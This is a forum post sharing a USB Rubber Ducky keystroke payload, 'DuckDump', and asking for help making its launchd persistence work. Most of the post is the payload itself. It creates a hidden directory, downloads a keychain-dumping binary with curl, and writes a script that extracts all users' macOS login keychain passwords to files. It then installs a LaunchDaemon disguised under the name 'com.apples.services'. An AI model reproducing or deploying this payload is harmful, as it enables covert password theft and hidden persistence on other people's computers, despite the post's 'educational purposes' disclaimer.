Jump to content

DuckDump - The Mac Keychain Dump Payload To Recover Passwords


Recommended Posts

I was trying to take advantage of a project called KeychainDump that extracts OS X Keychain decryption keys from RAM to dump passwords but am having an issue. First off, the source can be found on https://github.com/IsaiahJTurner/duckdump I compiled the keychaindump binary myself but feel free to compile it on your own if you don't trust mine. The issue I am having is that OS X launchd never seems to run. If I run the script manually, it works, but I wan't it to run automatically as soon as the user logs in. Any help?

Partially Inspired By: https://github.com/hak5darren/USB-Rubber-Ducky/wiki/Payload---OSX-Root-Backdoor

REM Isaiah Turner
REM This tool will automatically dump all passwords stored in the keychain to a file on the desktop upon login.
REM Please do not use this for evil, this is for educational purposes only.
REM http://isaiahjturner.com
DELAY 1000
STRING mount -uw /
ENTER
DELAY 2000
STRING mkdir /Library/.hidden
ENTER
DELAY 200

STRING echo '#!/bin/sh
ENTER
STRING curl -o /Library/.hidden/keychaindump 'https://raw.githubusercontent.com/IsaiahJTurner/keychaindump/master/keychaindump'
ENTER
STRING chmod +x /Library/.hidden/keychaindump
ENTER
STRING w -h | sort -u -t'"' '"' -k1,1 | while read user etc
ENTER
STRING do
ENTER
STRING homedir=$(dscl . -read /Users/$user NFSHomeDirectory | cut -d'"' '"' -f2)
ENTER
STRING /Library/.hidden/keychaindump $homedir/Library/Keychains/login.keychain > $homedir/Desktop/$user.login.keychain.txt
ENTER
STRING done' > /Library/.hidden/dump.sh
ENTER
DELAY 500


STRING chmod +x /Library/.hidden/dump.sh
ENTER
DELAY 200


STRING mkdir /Library/LaunchDaemons
ENTER
DELAY 200


STRING echo '<plist version="1.0">
ENTER
STRING <dict>
ENTER
STRING <key>Label</key>
ENTER
STRING <string>com.apples.services</string>
ENTER
STRING <key>ProgramArguments</key>
ENTER
STRING <array>
ENTER
STRING <string>/bin/sh</string>
ENTER
STRING <string>/Library/.hidden/dump.sh</string>
ENTER
STRING </array>
ENTER
STRING <key>RunAtLoad</key>
ENTER
STRING <true/>
ENTER
STRING <key>AbandonProcessGroup</key>
ENTER
STRING <true/>
ENTER
STRING </dict>
ENTER
STRING </plist>' > /Library/LaunchDaemons/com.apples.services.plist
ENTER
DELAY 500


STRING chmod 644 /Library/LaunchDaemons/com.apples.services.plist
ENTER
DELAY 200


STRING launchctl load /Library/LaunchDaemons/com.apples.services.plist
Edited by IsaiahJTurner
Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

 Share

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...